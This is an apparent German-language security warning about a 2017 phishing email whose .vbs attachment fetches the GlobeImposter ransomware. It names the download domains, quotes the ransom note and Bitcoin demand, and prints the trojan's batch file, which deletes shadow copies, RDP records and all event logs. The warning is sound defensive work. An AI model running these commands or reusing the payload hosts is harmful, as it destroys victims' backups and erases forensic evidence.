E-Mail mit Betreff ‚Scan‘ lädt die Ransomware ‚GlobalImposter‘ (Verschlüsselungs- und Erpressungstrojaner) nach und benennt alle Dateien in ..doc um!
Am Freitag, den 15. Dezember 2017 wurde durch unbekannte Dritte die folgende betrügerische E-Mail in englischer Sprache versendet. Öffnen Sie nicht das .7z-Archiv und führen Sie das darin enthaltene .vbs-Script nicht aus! Die Ransomware „GlobeImposter“ (Verschlüsselungs- und Epressungstrojaner) würde Ihren PC sonst verschlüsseln!
Betreff: Scan
Absender: Reid ([email protected])
—
Thanks & Regards
Reid Ludvinka
Achtung: Es handelt sich um eine betrügerische E-Mail! Öffnen Sie nicht die Anlage! Die E-Mail kommt mit unterschiedlichen Absenderangaben!
Die E-Mail bringt ein .7z-Archiv mit, welches ein .vbs-Script enthält:
Scan_00436.7z
Scan_001230.vbs
Das Script fängt so an:
Führen Sie das Script nicht aus! Von der Adresse highlandfamily.org/JKHhgdf72? oder l-ardagnole.com/JKHhgdf72? würde eine ausführbare Datei nachgeladen!
DTPGtbUB.exe
Es handelt sich um den Verschlüsselungs- und Erpressungstrojaner „GlobeImposter“ (Ransomware). Virustotal zeigt eine Erkennungsrate von 15/67.
Die Ransomware beginnt sofort damit, alle wichtigen Dateien in *.doc umzubenennen:
Daneben produziert „GlobeImposer“ eine Datei, die auf die Verschlüsselung hinweist:
Read___ME.html
Außerdem legt der Trojaner noch eine Batch-Datei an:
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete „HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default“ /va /f
reg delete „HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers“ /f
reg add „HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers“
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F „tokens=*“ %1 in (‚wevtutil.exe el‘) DO wevtutil.exe cl „%1“
Auf dem Desktop sind selbst die Links verschlüsselt:
Die „Read___ME.html“ zeigt folgenden Inhalt:
Your files are Encrypted!
For data recovery needs decryptor.
If you want to buy a decryptor click „Buy Decryptor“
Buy Decryptor
If not working, click again.
Free decryption as guarantee.
Before paying you can send us 1 file for free decryption.If you can not contact, follow these two steps:
1. Install the TOP Browser from this link: torproject.org
2. Open this link in the TOP browser: http://n224ezvhg4sgyamb.onion/sup.php
Die Seite „Buy Decryptor“ würde folgende Erpessung zeigen:
To buy the decryptor, you must pay the cost of: 0.059 Bitcoin ($ 1000)
You have 2 days for payment
time left :after finishing offer, decryptor cost will be 0.118 Bitcoin
You can buy bitcoin on one of these sites:
blockchain.info
localbitcoins.com
google.comsend 0.059 bicoin on the Bitcoin address: ***************
After payment enter your REAL e-mail to get the decryptor
SUBMIT E-MAIL